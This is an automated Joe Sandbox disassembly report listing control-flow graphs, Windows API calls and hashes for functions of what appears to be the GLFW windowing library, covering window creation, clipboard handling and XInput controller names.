8668->8672 8670 6460e333 GlobalUnlock OpenClipboard 8669->8670 8671 6460e329 8669->8671 8670->8671 8675 6460e39b EmptyClipboard SetClipboardData CloseClipboard 8670->8675 8674 64608298 9 API calls 8671->8674 8672->8666 8676 6460e38f GlobalFree 8674->8676 8675->8666 8676->8666 8690 6460639e 8691 646063b2 8690->8691 8692 646063d0 free 8691->8692 8693 646063ec 8691->8693 8692->8693

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 64608848-646088b8 KiUserCallbackDispatcher SystemParametersInfoW 2 646088c7-646088f5 GetProcAddress 0->2 3 646088ba-646088c2 0->3 8 64608904-646089a9 GetProcAddress * 6 LoadLibraryA 2->8 9 646088f7-646088ff 2->9 4 64608eb9-64608ec7 call 64608298 3->4 10 64608f93-64608f9a 4->10 11 646089ab-646089be GetProcAddress 8->11 12 646089bf-646089ce 8->12 9->4 11->12 13 646089d1-646089d5 12->13 14 646089d7-646089ea LoadLibraryA 13->14 15 64608a19-64608a2d LoadLibraryA 13->15 14->13 16 646089ec-64608a18 GetProcAddress * 2 14->16 17 64608a75-64608a89 15->17 18 64608a2f-64608a74 GetProcAddress * 3 15->18 16->15 20 64608ab8-64608acc 17->20 21 64608a8b-64608ab7 GetProcAddress * 2 17->21 18->17 23 64608ae2-64608d88 20->23 24 64608ace-64608ae1 GetProcAddress 20->24 21->20 25 64608d92-64608d9d 23->25 24->23 26 64608da7-64608dad 25->26 27 64608d9f 25->27 26->25 28 64608daf-64608dc2 call 64608533 call 6460877d 26->28 27->26 33 64608dd3-64608df1 call 646086ab 28->33 34 64608dc4-64608dd1 SetProcessDpiAwarenessContext 28->34 40 64608e03-64608e21 call 646086ab 33->40 41 64608df3 33->41 35 64608e00-64608e01 34->35 38 64608e29-64608e30 call 6460bb1b 35->38 38->10 44 64608e36-64608eaf GetModuleHandleW CreateWindowExW 38->44 40->38 48 64608e23 SetProcessDPIAware 40->48 41->35 46 64608eb1 44->46 47 64608ecc-64608f2c ShowWindow RegisterDeviceNotificationW 44->47 46->4 49 64608f2f-64608f61 PeekMessageW 47->49 48->38 50 64608f63-64608f7d TranslateMessage DispatchMessageW 49->50 51 64608f7f-64608f84 call 6460aef0 call 64609b0e 49->51 50->49 55 64608f89-64608f8e call 6460a331 51->55 55->10
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL ref: 64608876
                                                                            • SystemParametersInfoW.USER32 ref: 6460889A
                                                                            • GetProcAddress.KERNEL32 ref: 646088D8
                                                                            • ShowWindow.USER32 ref: 64608EDC
                                                                            • RegisterDeviceNotificationW.USER32 ref: 64608F21
                                                                            • PeekMessageW.USER32 ref: 64608F56
                                                                            • TranslateMessage.USER32 ref: 64608F69
                                                                            • DispatchMessageW.USER32(00000000), ref: 64608F76
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: Message$AddressCallbackDeviceDispatchDispatcherInfoNotificationParametersPeekProcRegisterShowSystemTranslateUserWindow
                                                                            • String ID: $$0cd$0;cd$<;cd
                                                                            • API String ID: 492125495-2933605525
                                                                            • Opcode ID: d6ccfd26f1ffe45069021f70fcd627825fc26292ea915f0df43bdb35d03f3396
                                                                            • Instruction ID: 1631ad54a60ab0754004a945e7f3dbe07b8806c8f3d5c1b253d8a438647a4c41
                                                                            • Opcode Fuzzy Hash: d6ccfd26f1ffe45069021f70fcd627825fc26292ea915f0df43bdb35d03f3396
                                                                            • Instruction Fuzzy Hash: 560233B050D380DFDB26DF66C98875ABBF4FB56708F00A81DE4898B650D7B58888CF56

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 58 6460496f-64604980 59 64604982-64604992 58->59 60 6460499f-646049a6 58->60 59->60 61 646049a8-646049c8 call 64602ef4 60->61 62 646049fc-64604a00 60->62 73 64604f66-64604f70 61->73 64 64604a02 62->64 65 646049cd-646049ec strcspn 62->65 66 64604f15 64->66 68 64604a07-64604a10 65->68 69 646049ee-646049f4 65->69 70 64604f1a-64604f27 66->70 71 64604ef4-64604f0a strspn 68->71 72 64604a16 68->72 74 646049f6 69->74 75 64604a18-64604c36 strcspn 69->75 76 64604f34-64604f3d 70->76 77 64604f29-64604f2e call 6460330d 70->77 71->66 72->69 74->62 78 64604c51-64604c58 75->78 79 64604c38-64604c4c call 64602ef4 75->79 76->70 82 64604f3f-64604f44 76->82 77->76 78->79 83 64604c5a-64604c8a strcspn 78->83 82->73 83->79 86 64604c8c-64604c94 83->86 86->79 87 64604c96-64604ca6 86->87 88 64604cac-64604cb6 87->88 89 64604e67-64604e73 88->89 90 64604cbc-64604cc1 88->90 91 64604e75-64604e81 89->91 90->74 92 64604cc7 90->92 93 64604e83-64604e86 91->93 94 64604e8c-64604e8f 91->94 95 64604cc9-64604cf8 strlen strncmp 92->95 93->94 94->91 96 64604e91-64604eac call 64609f29 call 646032ba 94->96 97 64604d00-64604d04 95->97 98 64604cfa-64604cfe 95->98 115 64604ee6-64604eed 96->115 116 64604eae-64604edf realloc 96->116 97->95 99 64604d06 97->99 98->97 101 64604d0b-64604d1e 98->101 102 64604e2c-64604e62 strcspn strspn 99->102 103 64604d24-64604d29 101->103 104 64604e0c-64604e26 strncmp 101->104 102->88 106 64604d3b-64604d43 103->106 107 64604d2b-64604d39 103->107 104->74 104->102 110 64604d45-64604d48 106->110 111 64604d4e 106->111 109 64604d53-64604d5e 107->109 113 64604d60-64604d63 109->113 114 64604d68-64604d6b 109->114 110->111 111->109 117 64604f46-64604f61 strtoul 113->117 118 64604d75-64604d78 114->118 119 64604d6d-64604d70 114->119 115->71 116->115 120 64604dce-64604dd4 117->120 118->102 121 64604d7e-64604dcc strtoul * 2 118->121 119->117 120->102 122 64604dd6-64604e00 120->122 121->120 122->102 123 64604e02-64604e0a 122->123 123->102
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: strcspn$callocstrcpystrlenstrncmpstrspnstrtoul
                                                                            • String ID: ,$,
                                                                            • API String ID: 1884079115-220654547
                                                                            • Opcode ID: 25bc4c535642e7489e7812ab0660e2ad26dbdeeb91398133799e6bb0e79760f3
                                                                            • Instruction ID: 4e2591ca80fda431e89cdfa17fb7706cfdf5ffbd0de9d582056cb6620bd4d30f
                                                                            • Opcode Fuzzy Hash: 25bc4c535642e7489e7812ab0660e2ad26dbdeeb91398133799e6bb0e79760f3
                                                                            • Instruction Fuzzy Hash: 06F14EB0D097698FDB25CF24CE807CABBF5EB66705F0095EAC448A7245E7719A88CF41

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 124 6460c519-6460c543 call 6460b543 call 6460af80 129 6460c545-6460c579 call 6460a6a5 call 6460a79f 124->129 130 6460c57b-6460c594 124->130 136 6460c5c4-6460c5d1 call 64608385 129->136 131 6460c596 130->131 132 6460c59c-6460c5bf call 6460b1d6 130->132 131->132 132->136 141 6460c5d7-6460c664 GetModuleHandleW CreateWindowExW free 136->141 142 6460c67a-6460c67c 136->142 143 6460c681-6460c6b7 SetPropW call 646086ab 141->143 144 6460c666-6460c675 call 64608298 141->144 145 6460c9b2-6460c9b9 142->145 149 6460c737-6460c744 143->149 150 6460c6b9-6460c734 ChangeWindowMessageFilterEx * 3 143->150 144->142 151 6460c74a-6460c778 149->151 152 6460c8ac-6460c8cc DragAcceptFiles 149->152 150->149 153 6460c77a-6460c7b9 call 6460c3c4 151->153 154 6460c7bc-6460c804 call 6460877d 151->154 155 6460c8ce-6460c8d5 call 6460b89f 152->155 156 6460c8df-6460c8e5 152->156 153->154 190 6460c806-6460c847 GetDpiForWindow 154->190 191 6460c849-6460c865 AdjustWindowRectEx 154->191 155->156 159 6460c914-6460c91f 156->159 160 6460c8e7-6460c8eb 156->160 161 6460c921-6460c928 call 6460737c 159->161 162 6460c946-6460c94b 159->162 166 6460c8f1-6460c90f call 6460c46e call 6460c4da call 6460b0a6 call 6460af9b 160->166 167 6460c9ad 160->167 161->142 178 6460c92e-6460c944 call 646076e0 161->178 169 6460c972-6460c977 162->169 170 6460c94d-6460c954 call 646021f7 162->170 166->167 167->145 169->160 176 6460c97d-6460c984 call 646064fa 169->176 170->142 184 6460c95a-6460c970 call 646025a0 170->184 176->142 187 6460c98a-6460c99b call 6460666f 176->187 195 6460c9a0-6460c9a2 178->195 184->195 187->195 193 6460c868-6460c8ab GetWindowPlacement SetWindowPlacement 190->193 191->193 193->152 195->160 198 6460c9a8 195->198 198->142
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32 ref: 6460C5E4
                                                                            • CreateWindowExW.USER32 ref: 6460C63F
                                                                            • free.MSVCRT ref: 6460C657
                                                                              • Part of subcall function 6460A6A5: EnumDisplaySettingsExW.USER32 ref: 6460A6EE
                                                                              • Part of subcall function 6460A79F: EnumDisplaySettingsW.USER32 ref: 6460A7DC
                                                                            • SetPropW.USER32 ref: 6460C690
                                                                              • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460870F
                                                                              • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460872B
                                                                              • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 64608747
                                                                              • Part of subcall function 646086AB: RtlVerifyVersionInfo.NTDLL ref: 64608765
                                                                            • ChangeWindowMessageFilterEx.USER32 ref: 6460C6DA
                                                                            • ChangeWindowMessageFilterEx.USER32 ref: 6460C704
                                                                            • ChangeWindowMessageFilterEx.USER32 ref: 6460C72E
                                                                            • GetDpiForWindow.USER32(00000000), ref: 6460C81B
                                                                            • AdjustWindowRectEx.USER32(00000000,00000000), ref: 6460C85F
                                                                              • Part of subcall function 6460B89F: CreateRectRgn.GDI32(00000000), ref: 6460B90B
                                                                              • Part of subcall function 6460B89F: GetWindowLongW.USER32 ref: 6460B95B
                                                                              • Part of subcall function 6460B89F: SetWindowLongW.USER32 ref: 6460B97D
                                                                              • Part of subcall function 6460B89F: SetLayeredWindowAttributes.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6460B9A7
                                                                              • Part of subcall function 6460B89F: DeleteObject.GDI32 ref: 6460B9B3
                                                                            • GetWindowPlacement.USER32 ref: 6460C87E
                                                                            • SetWindowPlacement.USER32 ref: 6460C8A4
                                                                            • DragAcceptFiles.SHELL32 ref: 6460C8BD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ChangeConditionFilterMaskMessage$CreateDisplayEnumLongPlacementRectSettings$AcceptAdjustAttributesDeleteDragFilesHandleInfoLayeredModuleObjectPropVerifyVersionfree
                                                                            • String ID: ,$I$`
                                                                            • API String ID: 131436255-777141184
                                                                            • Opcode ID: 0cb9c5bf2eeb64f56a6cd0c7beb129aca32bfc4b4948cbd305c90c412df7d815
                                                                            • Instruction ID: 4fcba12949c450f94256104e9e972d34c8d011c993fabe472bf4f4fe60441ba9
                                                                            • Opcode Fuzzy Hash: 0cb9c5bf2eeb64f56a6cd0c7beb129aca32bfc4b4948cbd305c90c412df7d815
                                                                            • Instruction Fuzzy Hash: 9FD1B0B4A083059FEB04EFA9C68479EBBF4FF89704F00C829E8999B245D7759845CF52

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 202 6460998c-6460999d 203 64609a10-64609a17 202->203 204 6460999f 202->204 205 64609b07-64609b0d 203->205 206 64609a1d-64609a3f 203->206 207 646099a1-646099a8 204->207 212 64609a45-64609a4a 206->212 208 646099aa-646099b1 207->208 209 646099bb-646099c3 207->209 208->209 210 646099b3-646099b9 208->210 209->207 211 646099c5-64609a78 209->211 210->209 213 64609a0a-64609a0e 210->213 218 64609a81-64609a86 211->218 212->205 215 64609a50-64609a64 call 64602ef4 212->215 213->203 213->204 215->205 218->213 219 64609a88-64609aa9 sprintf 218->219 220 64609af3 219->220 221 64609aab-64609aae 219->221 227 64609afd 220->227 221->220 222 64609ad3-64609ad8 221->222 223 64609ab5-64609aba 221->223 224 64609ac9-64609ace 221->224 225 646099ca 221->225 226 64609add-64609aeb 221->226 221->227 228 64609abf-64609ac4 221->228 229 646099cf-646099f5 call 646036a2 222->229 223->229 224->229 225->229 226->220 227->205 228->229 229->213 232 646099f7-64609a05 call 646035ef 229->232 232->213
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: sprintf
                                                                            • String ID: Unknown XInput Device$Wireless Xbox Controller$XInput Arcade Stick$XInput Dance Pad$XInput Drum Kit$XInput Flight Stick$XInput Guitar$XInput Wheel$Xbox Controller
                                                                            • API String ID: 590974362-1077793288
                                                                            • Opcode ID: d513b2141bc3ad312d71be5418f76d33285190a4b7cae771f26ec3d63cd6f96f
                                                                            • Instruction ID: 804f39a0cce51d99c337eb1727c2d52fc43592905ec737388b680bb4227ce87a
                                                                            • Opcode Fuzzy Hash: d513b2141bc3ad312d71be5418f76d33285190a4b7cae771f26ec3d63cd6f96f
                                                                            • Instruction Fuzzy Hash: 61313AB0A0C394DFD709AF69C68439ABFE2EB51B4CF05D82DE4949B284D775C488CB42

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: Load$HandleImageModule$ClassCursorRegister
                                                                            • String ID: #$0
                                                                            • API String ID: 1994909298-310112417
                                                                            • Opcode ID: 3bf254766e993e564a9534fe4bc37f7a9f591acf426d663c3deffeccc9797147
                                                                            • Instruction ID: 8833cee7edfb7f9070425f7573ad03eaceadb5a558f22546ce01d072ee062e0d
                                                                            • Opcode Fuzzy Hash: 3bf254766e993e564a9534fe4bc37f7a9f591acf426d663c3deffeccc9797147
                                                                            • Instruction Fuzzy Hash: F121EAB0808344DBEB01AFA5D95879EBBF4FF88705F00991DE59897240DBB989488B92

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0cd$$0cd$@0ad$@Jcd$`0ad
                                                                            • API String ID: 0-1914348268
                                                                            • Opcode ID: 1bd3d9c5e908754d6cf1e74d1230158fa814d11c3498cb25bf0402f2b0ec90f1
                                                                            • Instruction ID: 9be3b192a5a6e4199c112d2803d7f13388fb0735954f6ca832e5783398968a45
                                                                            • Opcode Fuzzy Hash: 1bd3d9c5e908754d6cf1e74d1230158fa814d11c3498cb25bf0402f2b0ec90f1
                                                                            • Instruction Fuzzy Hash: 4311866160839087FB09AF66C74071AB598AB62A56F05D03DD9458BB40EB72C8C4C757

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 267 6460bc57-6460bc65 268 6460bc67-6460bc69 call 6460b80c 267->268 269 6460bc6e-6460bc76 267->269 268->269 270 6460bc78 269->270 271 6460bc7d-6460bc83 269->271 270->271 273 6460bc85 271->273 274 6460bc8f-6460bc97 271->274 273->274 275 6460bcc6-6460bcce 274->275 276 6460bc99-6460bcbc RemovePropW DestroyWindow 274->276 277 6460bcd0-6460bcd9 DestroyIcon 275->277 278 6460bcda-6460bce2 275->278 276->275 277->278 279 6460bce4-6460bced DestroyIcon 278->279 280 6460bcee-6460bcf2 278->280 279->280
                                                                            APIs
                                                                            • RemovePropW.USER32 ref: 6460BCA4
                                                                            • DestroyWindow.USER32 ref: 6460BCB5
                                                                            • DestroyIcon.USER32(?,?,?,?,6460EC4B,00000001,64633B20,?,64602D7A), ref: 6460BCD3
                                                                            • DestroyIcon.USER32(?,?,?,?,6460EC4B,00000001,64633B20,?,64602D7A), ref: 6460BCE7
                                                                              • Part of subcall function 6460B80C: SetThreadExecutionState.KERNEL32 ref: 6460B82C
                                                                              • Part of subcall function 6460B80C: SystemParametersInfoW.USER32 ref: 6460B873
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$Icon$ExecutionInfoParametersPropRemoveStateSystemThreadWindow
                                                                            • String ID:
                                                                            • API String ID: 1815938153-0
                                                                            • Opcode ID: d7b234f1f98a1b0dd1aaf22ca65479dfced2ab44939d0e5755922a7d14ec9752
                                                                            • Instruction ID: ef17fc05eb6e287ab9b56e4bfc9850124767209affbb755ce7ea69302aa2200f
                                                                            • Opcode Fuzzy Hash: d7b234f1f98a1b0dd1aaf22ca65479dfced2ab44939d0e5755922a7d14ec9752
                                                                            • Instruction Fuzzy Hash: 981109B0208245DFDF55AFA5C9C8B597BE8EF05A41F00987CE895CB246DB74D440CB21

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 281 6460ec78-6460ec8b 282 6460ecaa-6460ecac 281->282 283 6460ec8d-6460ec9d 281->283 284 6460eccb-6460eccf 282->284 285 6460ecae-6460ecbe 282->285 283->282 286 6460ecd1-6460ece1 284->286 287 6460ecee-6460ecf5 284->287 285->284 286->287 288 6460ecf7-6460ed0b call 64602ef4 287->288 289 6460ed0d-6460ed0f 287->289 296 6460ed36-6460ed38 288->296 291 6460ed11-6460ed15 289->291 292 6460ed17-6460ed31 call 64602ef4 289->292 291->292 294 6460ed3d-6460eda5 call 64601440 291->294 292->296 298 6460eee3-6460eeef 294->298 300 6460edab-6460ee79 calloc call 6460c519 294->300 296->298 302 6460ee7e-6460ee80 300->302 303 6460ee82-6460ee89 302->303 304 6460ee9b-6460eea3 glfwDestroyWindow 302->304 305 6460eea8-6460eeac 303->305 306 6460ee8b-6460ee99 call 64601b16 303->306 304->296 308 6460eec1-6460eec8 305->308 309 6460eeae-6460eeb5 305->309 306->304 306->305 308->298 312 6460eeca-6460eed9 call 6460c46e 308->312 309->298 311 6460eeb7-6460eebf call 646037ac 309->311 311->298 312->298 317 6460eedb-6460eede call 6460c4da 312->317 317->298
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: DestroyWindow.callocglfw
                                                                            • String ID: 00cd
                                                                            • API String ID: 443364576-4044054280
                                                                            • Opcode ID: 07d9f19076beabb2907ae6ff3bec3432acb4300f844c70ff2a8576bc708936d2
                                                                            • Instruction ID: dd3ab8de1e64792acb9e15d1505939a65c139ece9168a58cb7d13142409f8cd5
                                                                            • Opcode Fuzzy Hash: 07d9f19076beabb2907ae6ff3bec3432acb4300f844c70ff2a8576bc708936d2
                                                                            • Instruction Fuzzy Hash: D16117B0904B648FE726DF19C68438ABBF4FF45B14F00895EE89997790D375AA80CF42

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 319 6460ebe8-6460ebfa 320 6460ec12-6460ec14 319->320 321 6460ebfc-6460ec10 call 64602ef4 319->321 323 6460ec71-6460ec77 320->323 324 6460ec16-6460ec35 call 6460ad78 320->324 321->323 328 6460ec43-6460ec46 call 6460bc57 324->328 329 6460ec37-6460ec3e glfwMakeContextCurrent 324->329 331 6460ec4b-6460ec50 328->331 329->328 332 6460ec55-6460ec57 331->332 333 6460ec59-6460ec5d 332->333 334 6460ec5f-6460ec6b 332->334 333->332 334->323
                                                                            APIs
                                                                            • glfwMakeContextCurrent.GLFW.3927611081(00000001,64633B20,?,64602D7A,?,?,00000001,64613040,64633024,?,646030E9), ref: 6460EC3E
                                                                              • Part of subcall function 64602EF4: calloc.MSVCRT ref: 64603030
                                                                              • Part of subcall function 64602EF4: strcpy.MSVCRT ref: 64603079
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
